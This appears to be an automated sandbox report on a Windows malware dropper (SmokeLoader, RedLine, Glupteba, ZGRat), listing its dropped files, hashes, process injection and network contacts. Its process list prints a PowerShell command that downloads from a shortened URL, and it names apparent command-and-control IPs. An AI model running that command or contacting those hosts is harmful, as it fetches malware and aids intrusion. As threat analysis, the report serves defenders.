Malware Analysis Report

2025-03-15 05:17

Sample ID 231218-2b3rrsfde9
Target 0x00310000000142c9-42.dat
SHA256 2b3edccf5deb78e43bf9267a60f85b096b25f15cf6bd1c83c56404d7fe0e7dda
Tags
smokeloader redline livetraffic backdoor infostealer trojan glupteba zgrat 666 up3 dropper loader rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2b3edccf5deb78e43bf9267a60f85b096b25f15cf6bd1c83c56404d7fe0e7dda

Threat Level: Known bad

The file 0x00310000000142c9-42.dat was found to be: Known bad.

Malicious Activity Summary

smokeloader redline livetraffic backdoor infostealer trojan glupteba zgrat 666 up3 dropper loader rat spyware stealer

Glupteba payload

SmokeLoader

RedLine payload

ZGRat

Detect ZGRat V1

Smokeloader family

Glupteba

RedLine

Downloads MZ/PE file

Reads user/profile data of web browsers

Loads dropped DLL

Deletes itself

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Unsigned PE

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-18 22:25

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-18 22:25

Reported

2023-12-18 22:27

Platform

win7-20231215-en

Max time kernel

34s

Max time network

41s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9E23.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C0A2.exe N/A

Legitimate hosting services abused for malware hosting/C2

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1260 wrote to memory of 2796 N/A N/A C:\Users\Admin\AppData\Local\Temp\9E23.exe
PID 1260 wrote to memory of 2796 N/A N/A C:\Users\Admin\AppData\Local\Temp\9E23.exe
PID 1260 wrote to memory of 2796 N/A N/A C:\Users\Admin\AppData\Local\Temp\9E23.exe
PID 1260 wrote to memory of 2796 N/A N/A C:\Users\Admin\AppData\Local\Temp\9E23.exe
PID 1260 wrote to memory of 1680 N/A N/A C:\Users\Admin\AppData\Local\Temp\C0A2.exe
PID 1260 wrote to memory of 1680 N/A N/A C:\Users\Admin\AppData\Local\Temp\C0A2.exe
PID 1260 wrote to memory of 1680 N/A N/A C:\Users\Admin\AppData\Local\Temp\C0A2.exe
PID 1260 wrote to memory of 1680 N/A N/A C:\Users\Admin\AppData\Local\Temp\C0A2.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe

"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"

C:\Users\Admin\AppData\Local\Temp\9E23.exe

C:\Users\Admin\AppData\Local\Temp\9E23.exe

C:\Users\Admin\AppData\Local\Temp\C0A2.exe

C:\Users\Admin\AppData\Local\Temp\C0A2.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

Network

Country Destination Domain Proto
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
RU 5.42.65.125:80 5.42.65.125 tcp
US 8.8.8.8:53 github.com udp
RU 77.105.132.87:17066 tcp
DE 140.82.121.3:443 github.com tcp
DE 140.82.121.3:443 github.com tcp

Files

memory/1220-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1220-2-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1260-1-0x0000000002990000-0x00000000029A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9E23.exe

MD5 9a747219c8fab73e2ba0541e3d86cd8b
SHA1 0723a7c85108ebd6a8141a7ce2459c35add81a0c
SHA256 eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01
SHA512 acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83

memory/2796-14-0x0000000000170000-0x00000000001C2000-memory.dmp

memory/2796-19-0x0000000074EB0000-0x000000007559E000-memory.dmp

memory/2796-20-0x0000000004FF0000-0x0000000005030000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C0A2.exe

MD5 8426cb86fd074a9fa24c7a03fb6ba83e
SHA1 0703f24aee9b972ee7f013d68e0bc6adf6815f2f
SHA256 4c31482f75d5235702a7e5524dc37650cf1501d76c362897cc381ecd4dd18f8b
SHA512 9aa69dc7d85cffcfed21447c327525cce8431e0a261cf72c0e54794725ebc2b9d8092d04d41ba38e8e8e99303a9e4ec8370d9921bea429b4567af41394ab5b67

C:\Users\Admin\AppData\Local\Temp\C0A2.exe

MD5 8420b69596c39acf6dbb223d54cd0c63
SHA1 ff085bc696ecb71f0dd6a145789be36238c09079
SHA256 5a1378f18b3ffb4d5bcb9c01920d76381edc7b8a73581129f9f0e7c19e4267ce
SHA512 fcc88ddfe7baefb0a58fcb7fa34ea07340491f9b0a051e1ca9670130e9ec291879cc44a28562033bb8f24ac8f53aee8ce0c5bb42011002776da42110972ae9ca

memory/1680-27-0x0000000074EB0000-0x000000007559E000-memory.dmp

memory/1680-28-0x0000000000D20000-0x0000000001B12000-memory.dmp

\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 0b4f47c84fea3289d10a7c8ee44e9a05
SHA1 1dcee1baf50d19875fac2fe10c9be03cc56d14a3
SHA256 46c923f681342628b916cd91c459a1ffb5ea616bc0d3a1cd534a25ef60058f1b
SHA512 93a587c9ed64d100085e70b4fffb4e853e87a7904b4a3b4e5a20b2f3dd8589db7efda3de70dead2eb88c45f115d4c6746d58acfaa8f4bbf6d24a9a0decea313c

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 93fd9db8463f1399af604b73f5b91f98
SHA1 fa74506d738165d8b393eddd9d4946658a0ce9d0
SHA256 2db9f15147bc3d2c0eedfef29143bfb09a9252dade8f35ebc77ab4943a1b7b28
SHA512 0a93a75cd22dc723764f6eb9a163311c2ff7b395e50ab2ceb4c60e07b04105456d754e5bcebc5650489691ea1d12e6057a493d307988b4b211ec5f536de0b3af

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 62b01ec4a955eab3a7a41e2c07f18913
SHA1 48d8e1e391fa078d78e2130481f9d35eb45a11ec
SHA256 c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56
SHA512 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 da02cbbe2494696eab1d22b727df2568
SHA1 000cf27825245f6808d338fa9166b79079802641
SHA256 6037979e0cdf0b3f983483e00d964ee1a1d17075da3e313610254269ac186cbf
SHA512 f687527f44303e01b6da681b8919e6dbd19dfcfdd2927314f0851952dbc7d21f4bdf4fbea69e0f88d8c84c06b87c55b1612588166c59319562ab80ed819a850b

\Users\Admin\AppData\Local\Temp\nsoCACF.tmp\Math.dll

MD5 ebd8a7a5042ae1d4ce1aa9071859c851
SHA1 ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6
SHA256 fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837
SHA512 daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e

memory/2668-58-0x0000000002560000-0x0000000002958000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 628ed1cb74d466586abe2c07dd9054ca
SHA1 f579b31bb48ef7b1f900d3e024808af152212569
SHA256 e5cef7f1f342e2cd37533d13a33116f19b646b1264ac0f1bcf8ebf7d3383ee27
SHA512 fd95edafc0f78724dd3b1312adef01c59a487df238f431351e8acaff0d8ca4af8563ecee1aec7487d67ec77bf138e90d8878170e8453e268fd50032f81939dd6

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 bba2971c6aa2f5185c334e0600ddbb8f
SHA1 154dbd64a6fc433bfb28d8fa4cbd7d7e295f9a5e
SHA256 ef63f4971cda8b49df48e66af3c374fd2878f81ad5b2f4f24d0c85b0e294bd0e
SHA512 a465675bac51bc6848093017dc439991ad7d7280787770a5d7cabe96f3a216fb85c53bc9ffb87733cd2cff11f059da4e339aea97b5c3953b1c6a0cab2eb9122d

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 9be9673496e2c450154568b60d2e5db4
SHA1 453eddc50ed7d3c7dbad8d7f88c3cb0f977d41a2
SHA256 ea0cdeb898250d7ce38bfe22e88dc247f428726ce870fd6ad37cd313cdde3e54
SHA512 a7a8176633b2ab837cae379bac6e7b5481fb24554b989d2c06503babaa896f65acb18500dd93408e6d08d95e215ca790c4dfba19c8a09eb36ce8c01b97d3da8a

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 81df7fc6a5f25fdb9cd4e20359e4375d
SHA1 8adbd2cd7b0d8ba270ffb02ff4161887e19d9689
SHA256 b1f679a0eb94145ce8e752a5a39123e1cdc01528ecd11d2eecdf7efd7d704c41
SHA512 76c5a264203e898b84152d0ea4334e95cf576661ed98d92d6293d919a76e73ca0b7dc6f7bafc3081c23f3d585b205cbb1aaa7d7b2f3f293801c9183e90155eb9

\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 52c0b1e179b7a02c3994a1906f9dcb2c
SHA1 7cb6945491fe0dc3d9a0733fd2fb460fd5829caa
SHA256 5ad4bbace04417d727f5ad9e391f6448d1a48a10b8d9a8c203ad09bc5197e610
SHA512 4b1b53baf326e91cb5e7ec290b0ba81681c9f7a3106c34e571c93997a82dd8e68b9cacfbc2ff9493b4bcbc025a45613f35a756cc3cb6622dff288972d3b4afa4

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 9193ff317000ba1603345d92a1a8fbbd
SHA1 3e8c626c9439054b4e0c637a22605d10d497abb4
SHA256 aa0bce4669b5390242740bc7fcbb8e9c53a7f3e6c158bb0e4fa2dbb8049d35f2
SHA512 fbb673e035e888ff1170b767e7f031feb4cf66634af10ec8f65c499c48ca3087dc3996eeda68920fa94458b8d3d3e1562128b37f1fa1d6c70bf5acd228ff5bc5

memory/1876-69-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 4bebcc80c4f2920e5e7252492b38c140
SHA1 4bcae052db639d6996b886d732965acc82f878d7
SHA256 38610902e0ba8bddeca6b0be96c1cb10659fbafd3079ff6863194c17ca1b2a15
SHA512 89e2cf8118169b342485c241447e87492c015f14f2a596c648d77e36a96f517bb91172acf4d63a5925d4e455d5b1cd81382a9f3e036c234d5b2dfb423d59638f

memory/1680-72-0x0000000074EB0000-0x000000007559E000-memory.dmp

\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 0a90f231fcfede6e071cfa5e88b244f7
SHA1 161954936f6bef19c895d6798a9ebc1e36eb8d5f
SHA256 79ea00cd8c63517f97df7948f4ecd1ee2a9b675d3e5af787ee27fab78abe576e
SHA512 0f9ce57279ce81200514c843038b640c4a2138badf12a57651360a906dab9f3ee4c6e3b4473a2eebc4e819db587ef217fd49d5871d1607f8609e8b1942d7c171

\Users\Admin\AppData\Local\Temp\nsoCACF.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-18 22:25

Reported

2023-12-18 22:27

Platform

win10v2004-20231215-en

Max time kernel

56s

Max time network

117s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\F7ED.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\933.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\933.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1608 set thread context of 1356 N/A C:\Users\Admin\AppData\Local\Temp\933.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\F7ED.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3552 wrote to memory of 1832 N/A N/A C:\Users\Admin\AppData\Local\Temp\F7ED.exe
PID 3552 wrote to memory of 1832 N/A N/A C:\Users\Admin\AppData\Local\Temp\F7ED.exe
PID 3552 wrote to memory of 1832 N/A N/A C:\Users\Admin\AppData\Local\Temp\F7ED.exe
PID 3552 wrote to memory of 1608 N/A N/A C:\Users\Admin\AppData\Local\Temp\933.exe
PID 3552 wrote to memory of 1608 N/A N/A C:\Users\Admin\AppData\Local\Temp\933.exe
PID 3552 wrote to memory of 1608 N/A N/A C:\Users\Admin\AppData\Local\Temp\933.exe
PID 1608 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\933.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1608 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\933.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1608 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\933.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1608 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\933.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1608 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\933.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1608 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\933.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1608 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\933.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1608 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\933.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe

"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"

C:\Users\Admin\AppData\Local\Temp\F7ED.exe

C:\Users\Admin\AppData\Local\Temp\F7ED.exe

C:\Users\Admin\AppData\Local\Temp\933.exe

C:\Users\Admin\AppData\Local\Temp\933.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Users\Admin\AppData\Local\Temp\4071.exe

C:\Users\Admin\AppData\Local\Temp\4071.exe

C:\Users\Admin\AppData\Local\Temp\4CB7.exe

C:\Users\Admin\AppData\Local\Temp\4CB7.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c install.bat

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\is-E9HMQ.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-E9HMQ.tmp\tuc3.tmp" /SL5="$200022,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"

C:\Users\Admin\AppData\Local\Temp\7474.exe

C:\Users\Admin\AppData\Local\Temp\7474.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 146.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 68.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 52.216.114.251:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 8.8.8.8:53 251.114.216.52.in-addr.arpa udp
RU 5.42.65.125:80 5.42.65.125 tcp
US 8.8.8.8:53 125.65.42.5.in-addr.arpa udp
RU 77.105.132.87:17066 tcp
US 8.8.8.8:53 87.132.105.77.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
N/A 195.20.16.103:18305 tcp
US 8.8.8.8:53 103.16.20.195.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.237.62.212:80 api.ipify.org tcp
US 8.8.8.8:53 212.62.237.104.in-addr.arpa udp
BG 91.92.254.7:80 91.92.254.7 tcp

Files

memory/4572-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3552-1-0x00000000028F0000-0x0000000002906000-memory.dmp

memory/4572-2-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F7ED.exe

MD5 9a747219c8fab73e2ba0541e3d86cd8b
SHA1 0723a7c85108ebd6a8141a7ce2459c35add81a0c
SHA256 eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01
SHA512 acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83

memory/1832-12-0x0000000000A80000-0x0000000000AD2000-memory.dmp

memory/1832-17-0x0000000075180000-0x0000000075930000-memory.dmp

memory/1832-18-0x0000000005760000-0x0000000005D04000-memory.dmp

memory/1832-19-0x00000000051B0000-0x0000000005242000-memory.dmp

memory/1832-20-0x0000000005110000-0x0000000005120000-memory.dmp

memory/1832-22-0x0000000005340000-0x000000000534A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\933.exe

MD5 1713300ba962c869477e37e4b31e40af
SHA1 d5c4835bc910acccd28dbed0c451043ea8de95ef
SHA256 2bcdb7a75707f841615be19f4bbcb95fc6b16ce19fb7ea782c5ff43ea1be024d
SHA512 70b2a2b17c6b3a0a295baf536451ef38c6e9e292a3c967a9fc950a6de321bbac0dc45e942ef151ba81b717f8ede3166388e68ce75f2afff0ec16aea98ea742e1

C:\Users\Admin\AppData\Local\Temp\933.exe

MD5 068690aedee04ddb02bfe5d5eadd2892
SHA1 5c84769fe148af03bce4acb9ce95da2f089b810f
SHA256 b376c42b8254e7851c0afb17bdfd169b5f7a46ca0bcb7b133a985ee979b68096
SHA512 0a23833e7d0d41f60b582b00e80fe1431690446e6bec01ce6b812ae59f92b65e03d36ddb12e4b9184d8e9121b902f08d2a727d86e05a7e5a99aa08509b31de24

memory/1608-26-0x0000000075180000-0x0000000075930000-memory.dmp

memory/1608-27-0x0000000000FE0000-0x000000000147E000-memory.dmp

memory/1608-29-0x0000000005FC0000-0x000000000605C000-memory.dmp

memory/1832-28-0x00000000067C0000-0x0000000006DD8000-memory.dmp

memory/1608-32-0x0000000005D00000-0x0000000005D10000-memory.dmp

memory/1832-31-0x00000000066A0000-0x00000000067AA000-memory.dmp

memory/1832-33-0x00000000065C0000-0x00000000065D2000-memory.dmp

